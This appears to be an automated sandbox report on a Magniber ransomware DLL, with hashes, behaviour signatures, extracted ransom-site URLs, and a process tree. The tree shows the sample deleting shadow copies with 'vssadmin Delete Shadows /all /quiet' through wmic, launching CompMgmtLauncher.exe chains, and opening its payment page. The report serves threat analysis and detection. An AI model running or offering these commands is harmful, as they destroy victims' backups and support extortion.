Analysis
-
max time kernel
147s -
max time network
140s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
15-03-2024 17:12
General
-
Target
cbf762fb16cfe0149b46a61f3fb029fd.dll
-
Size
38KB
-
MD5
cbf762fb16cfe0149b46a61f3fb029fd
-
SHA1
24d70407e12631bd83f39164bcd5ca6a74a0b459
-
SHA256
2cd5879589f6af26488a2c9451d279306c472302375916e34f2646e7095ce4b9
-
SHA512
e26dd9fcb24b7357da2230c87d6ee7ed59f1288118160b42d92161a42e77a91077a8a9c6b9ab49a68f6cdf7135d57be3a465190118112d1c0a49e7408b28a853
-
SSDEEP
768:tNB4vRN8egwET/AOBHR9T7lGFDZFpVNKu90lQtwPFhXB+6OPvF65IM0:5A8ugn5T7le1l1Gb+6OPvdM
Malware Config
Extracted
C:\Users\Admin\Pictures\readme.txt婍
http://0894f630026cc460c8awbcrke.grv4f55lyxu36y26o4orfzy7vmwiljcruko6r7q4tatxvjugg4j66lid.onion/awbcrke
http://0894f630026cc460c8awbcrke.hegame.xyz/awbcrke
http://0894f630026cc460c8awbcrke.tietill.space/awbcrke
http://0894f630026cc460c8awbcrke.hesmust.top/awbcrke
http://0894f630026cc460c8awbcrke.salecup.club/awbcrke
Signatures
-
Detect magniber ransomware 2 IoCs
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 12 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (80) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Suspicious use of SetThreadContext 4 IoCs
-
Interacts with shadow copies 2 TTPs 8 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Modifies Internet Explorer settings 1 TTPs 34 IoCs
-
Modifies registry class 11 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious behavior: MapViewOfSection 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 7 IoCs
-
Suspicious use of SendNotifyMessage 2 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of UnmapMainImage 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
-
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
-
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\cbf762fb16cfe0149b46a61f3fb029fd.dll,#12⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt?3⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\cmd.execmd /c "start http://0894f630026cc460c8awbcrke.hegame.xyz/awbcrke^&2^&50094979^&80^&387^&12"?3⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://0894f630026cc460c8awbcrke.hegame.xyz/awbcrke&2&50094979&80&387&12?4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1716 CREDAT:275457 /prefetch:25⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
-
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
67KB
MD5753df6889fd7410a2e9fe333da83a429
SHA13c425f16e8267186061dd48ac1c77c122962456e
SHA256b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA5129d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444
-
Filesize
344B
MD5850457ba1a396bf8632c0a2bfd74a02e
SHA15bf3574dc7c379702603379cc9f2799404613ca0
SHA2560c57ddf69aa9d10697dcf1299c7cf29efe252865efc46f528f6c4e45f3a0f25b
SHA51205e7be2ef68a8a68b316bc05587c5ba4ff6dfae22d4838fab9a5a66f4d1932881c29d078bca2d5d6a91f60eedba9d7b21845b1403e3490a6d555fa8c64b21d28
-
Filesize
344B
MD50e10a30924b28805ae54e622ade10caf
SHA166142b1bee66e5f8106cc9b9fb05ebaae0a08bfe
SHA256c4ebe0ab534390300fef4d7e668f45d8e5638ffdf2f2b8c69d8eec88ee0bb33d
SHA5122586162d8238174b493068484db565a225c3c328da81d9dee84149b3587ff75bafdc54e6425a101e052ac290b57bc21acf93463160c623c601cf20a48bd2354d
-
Filesize
344B
MD543e0abf4be4239b12cf72af94616716e
SHA149058173a0bd922a7f81bfae77a094fe2c694633
SHA25611a44a663904b45f739d873df7195aa1a11ed0c650ef09a53726dd799ed39a25
SHA51278c601a52de5ec28f66afc4862e41d8c3fe3066ef4c94201ac33144c2e0ae14b4834c92d1696b2a882498b3975b095ac25ab1585d145d2639193c01de22058c3
-
Filesize
344B
MD5dda320cd31473ef3ccef14bc8752b242
SHA1dbcb3b48f70653844ac5af9c7d6191f3534899ac
SHA256eaa6081980516765296340bba8bb22e8e30a7570a88a700e68c2b590893b05df
SHA512fa72d2746d12a807656ddd8cff3c09b761c96e57761eb446d8a6e586ef7c47a048ff7617de3c2118a6f856a12e52299b9f7ff6ac28d424f90e4cd8fb926c1d0f
-
Filesize
344B
MD58328877a477e485d933825633bf5d251
SHA13a630d5e707870ebd9da34a5daa8b64f8dc3fc0e
SHA256beeb08a21817e1343f78ca435f946ebe5017bbdcd5e0a2f9e04574d9ccce93ec
SHA512b49191cff8a53978cc00f699ba45e00a193a05333aa95f15caf5413ebc4b587f72caa2e5897ab687ecdc441f71ee26dcdf5bd4c8e791f08bcb000e205c486890
-
Filesize
344B
MD53a21a23762d516ce8b37380e6852aceb
SHA161f20ad34caa9b855a2bd6e28525d05f38f482f3
SHA256fff4237af7259425fde4849c079d096beea3420ded1543d30d07779a77793975
SHA5126f456d5faa315b0cff8bf1ae741481c9054faf5dea1b777efa27d68d0ea12fec95dcab22654fd9af4d74b09233bcad623c0ef80221b2ebf6526cfa26f883a379
-
Filesize
344B
MD58a367609b4439bf8b2e8d9f8eeeac0fe
SHA134529ab9894b4b5b5bdf99b8b19c6e81f8593eb5
SHA256e722f2ecb78946f170798649910858d2ba50f6273fc70548499326993fe9f4ed
SHA512157cc73296e73f177166cd8609481be91402563b5425f88166f25b5ac9b6141e7bde92e6936ca2ba5ecc50fc6c25170816e49a4c29f401c5f830dea7da41765f
-
Filesize
344B
MD538da571e1a13d76453e0fdbb2e99fb25
SHA106a27ba0196431188d051336dd7c0012ddd07bef
SHA25654f170165cb87f414d18813023155bd02c2c6d0a82ba3fbe6affc362cc638109
SHA512c21d47f93b78c98c052b15c1f4f2021a16df279b7790f7db7b548b0dbc2e8d889bea77bc4a9099dda406c495b72dee187e6cee937c43663dd2327bc283c9ce3f
-
Filesize
344B
MD5b0673bc73c88052289fac27f32c4b4c3
SHA111347f1b1edbd94f6576f9daba7d63c9df131a91
SHA256c3c5b53b04ac1e8f8109c1b0565c4afb4d3da98e5892bdc8f6a96c92eb341487
SHA512b5510d607d293a78d34aa0683434395753294150cb515b748c7cd68f4418f739c9cb58ad1b8e6af58402480c7b37fcfa385d02e49c166d0e853e214a40519d60
-
Filesize
344B
MD5817848529f11f95b8e19cb37df1f60fb
SHA1a50f153655b3f646b7f779d280757c6edb78e184
SHA2560af2b271a3a6b864e48c79e863885fc08a47e14bedfba42f122fa68cd3274db6
SHA512fa649da15900cd57f6bf5138da02cc6577306d1c846f7c21f334c423f846ba81f5654dddb8c5f109b379299aea403d520235bbfda399cff2db585c1c1e6b4033
-
Filesize
344B
MD52ff2981d256e276ff5c5090c41b8510d
SHA12b23b5bf82baf71ad98ca467a5129c43491077be
SHA2561875dbb07ead44e1fed8772454a88d2877029ed6ff074d632337931e07b24719
SHA5122f64d2aee95f7b15c93877e176dff46039a35f5f2857eb2235255f324d9e79edd5f926ab1c104fc5cf6566b36061d77d9bacd47e64e111a9cbfe0db022da3a21
-
Filesize
344B
MD57cdecc6929b18dedf33ab3eaf0407732
SHA1134c5c5209e01077510f82de897e5dfba16608f2
SHA2560dcc004e5591605e9407fcc53443a6c6694977ee281889a8e1f2a010f1505d6f
SHA51260bb9f676578c299cb53bd5a18d78035258763ac4b9494906ace60dfeff263c68743e5baf6e8845282052c0d8ee0c4254c9bd956efc662e273bc20a30fd337ac
-
Filesize
344B
MD5dffb38646d04435d4454ab122751d4af
SHA103f833d94b03195f2e556f2bda9a9d4064303492
SHA256967a71066b01906827f4ccbda367485b911ec33c5d761964adfee652e28945a9
SHA5125fb3bad44376d83b92e12f1c800c881ad7350d34ae174e7bae5cf778b8f71a0cfb38ca6af03a105ec8e757621f5cf910779471d84c10821816136ab18c3660d5
-
Filesize
344B
MD5ca51d05964d58b7b00aa23a0ce1a4f73
SHA1c8c5f3ee612fd7691b5bebb819e100d2d7a1e055
SHA256702ebd6ff8243df83de3cb7946d03cb151ece178cdbe1d65603e42d683382df9
SHA512c54c07dcf826523703d7bea4dff53264806e488f7c6b8f14af66f3cc9113a63dc48986143623b316cb14f04d79470b1d3d6242a20d2e62ae5470c3d34c69bd12
-
Filesize
344B
MD5c629e51def9f8593b3c99bf5e1252394
SHA1f8c77d09e8cf49ec4911f3a1930ae63fed2e3653
SHA256e0bd90e683c3a77137b497dc1d352d1218953eb6e7e68bf129514c1ed1798429
SHA512e0c3dd9a06381d994662643216c93f938bd16a2d39ffe8df520f86725ae68ff41c786bd3a091f1b0df1b929fac0b479d76d0fafad4751608e7f9da961b97b344
-
Filesize
344B
MD5a1a28e3dc2c42c3f2a31456f44251293
SHA120d9557e3feef653a6b1d27b0ea30e3c12291ae4
SHA256287e8d23a6da3b165f2a1d0949ec11446b5cc6ec9abee5e30b939d50ecfff42f
SHA512ac6842afdd4a79f8d570607fafbbbe393cf2374720082c10f18a43a7efba7ad09f31414589adf99d6f579d83518c00042b35d8b33a4673de4b0e529709ac3c0b
-
Filesize
344B
MD5e1e65aace3a862c23cce5bebaf6c1080
SHA1d53274683c5d21c1e67eb01486e14dcb4947d231
SHA256e9e46b572aad099f759f8fe4d0837e74f01dd8cc7ede8645e24d83929f7afb37
SHA512240314864dbb6e476b199b379990f93a6a48355b105eef0ec1b2ba50055becf4f1185dd9c6f005b75ad55e94a0ba57facd4666ce8fb90c79a133b33f4aa8587d
-
Filesize
344B
MD5d5d29366861c80791f7afc9d9fe25a2f
SHA13dcc25b8a30744c5245bfee2eeb2534049699a43
SHA2561192b39177f6c83fc8dbb7ce2fd3c91dae57a3bde48c116ba52efa2c28220625
SHA512b8ce2d83923248d0b104a3f3e006ca53f56782d03ae63e63acf483fea3ff5d3df49d2586d5c6f5c521cf6ff54ab258bb20d5cff63733ebdef2b2343978beee38
-
Filesize
344B
MD5c1b7865e2b01ba68b2abd87484526ea9
SHA13fdc8ac609f2e8fcfedbdc003798d1ecf0889210
SHA25641643b2bc363497f99ca60f76ad4f77b7046d504e8488e45576934feca43b7ff
SHA512b11fa7b36e279c92e93119249dca7fd100ab087e6ef2160c5164b137363689ace033ebc62abb00a5a834f81302d04118b5fc6b75c3f1555664b99ff62140e0a0
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
175KB
MD5dd73cead4b93366cf3465c8cd32e2796
SHA174546226dfe9ceb8184651e920d1dbfb432b314e
SHA256a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63
-
Filesize
1KB
MD5eb0f100c88123a830b7dc84a9540e4e6
SHA127d6f4820204565ff3961f6d89090cc3afff2c4a
SHA25689a1148a4e60a3e643cd742176c8465530a7297521e8f250672be80d07bea97b
SHA512496e59bb6ff7da90f59c0388327b1e620ed6fc6cb3a0ee3a6305393a795ddb29fa62b0d6d01a677a6981068351ddf3bf88f413665486ad4c02e5be3a3ad1e9dc
-
Filesize
20KB
-
Filesize
20KB
-
Filesize
9.2MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB